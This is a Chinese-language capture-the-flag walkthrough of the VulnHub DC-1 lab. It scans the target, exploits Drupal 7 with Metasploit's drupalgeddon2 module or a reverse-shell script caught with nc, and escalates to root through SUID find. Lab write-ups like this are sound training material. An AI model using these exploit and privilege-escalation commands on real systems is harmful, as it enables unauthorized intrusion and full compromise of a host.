1.扫描主机
sudo arp-scan -l
![图片[1] - vulnhub DC-1靶场 - MaxSSL](https://www.maxssl.com/uploads/?url=https://s2.loli.net/2023/12/11/zcCFWat3dSEvZuN.png)
扫描端口
nmap -p- 192.168.42.147
![图片[2] - vulnhub DC-1靶场 - MaxSSL](https://www.maxssl.com/uploads/?url=https://s2.loli.net/2023/12/11/xbdSDanvQOBXI2K.png)
扫描主机指纹,发现Drupal 7 cms
![图片[3] - vulnhub DC-1靶场 - MaxSSL](https://www.maxssl.com/uploads/?url=https://s2.loli.net/2023/12/11/jho3PpGzauVRCxb.png)
2.得到shell(2.1,2.2)只用一种即可2.1开始msf漏洞利用
mfconsole
![图片[4] - vulnhub DC-1靶场 - MaxSSL](https://www.maxssl.com/uploads/?url=https://s2.loli.net/2023/12/11/XAuqgibIFQR2vC1.png)
search drupal
search 7600
use exploit/unix/webapp/drupal_drupalgeddon2
![图片[5] - vulnhub DC-1靶场 - MaxSSL](https://www.maxssl.com/uploads/?url=https://s2.loli.net/2023/12/11/V2ueql4LxPZTjcD.png)
set rhosts 192.168.42.147
run
![图片[6] - vulnhub DC-1靶场 - MaxSSL](https://www.maxssl.com/uploads/?url=https://s2.loli.net/2023/12/11/gwpVUXYbyOt76xd.png)
2.2脚本exp得到反弹shell
找到脚本,修改脚本,执行脚本
![图片[7] - vulnhub DC-1靶场 - MaxSSL](https://www.maxssl.com/uploads/?url=https://s2.loli.net/2023/12/11/ruNETO7MV5jkcS3.png)
![图片[8] - vulnhub DC-1靶场 - MaxSSL](https://www.maxssl.com/uploads/?url=https://s2.loli.net/2023/12/11/q7QVxtSd5JYmyrC.png)
![图片[9] - vulnhub DC-1靶场 - MaxSSL](https://www.maxssl.com/uploads/?url=https://s2.loli.net/2023/12/11/xUN8RMYEIBFDvhk.png)
nc 监听 8888 端口 得到反弹shell
python -c "import pty;pty.spawn('/bin/bash')" 美化一下
![图片[10] - vulnhub DC-1靶场 - MaxSSL](https://www.maxssl.com/uploads/?url=https://s2.loli.net/2023/12/11/RpHXtLDmrSZ2Ohb.png)
3.metepreter> 看到这个,说明成功拿下shell
shell
python -c "import pty;pty.spawn('/bin/bash')" 美化一下
![图片[12] - vulnhub DC-1靶场 - MaxSSL](https://www.maxssl.com/uploads/?url=https://s2.loli.net/2023/12/11/qYP3pV8SjHD7i15.png)
4.开始提权
find / -perm -u=s -type f 2>/dev/null
![图片[13] - vulnhub DC-1靶场 - MaxSSL](https://www.maxssl.com/uploads/?url=https://s2.loli.net/2023/12/11/dAXoup5VMn8L2OU.png)
发现/usr/bin/find,利用提权
find . -exec /bin/sh \;
![图片[14] - vulnhub DC-1靶场 - MaxSSL](https://www.maxssl.com/uploads/?url=https://s2.loli.net/2023/12/11/Qjb7xngOHGce2N1.png)
成功提权,寻找flag
![图片[15] - vulnhub DC-1靶场 - MaxSSL](https://www.maxssl.com/uploads/?url=https://s2.loli.net/2023/12/11/jN6LVUK5h7rtciA.png)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
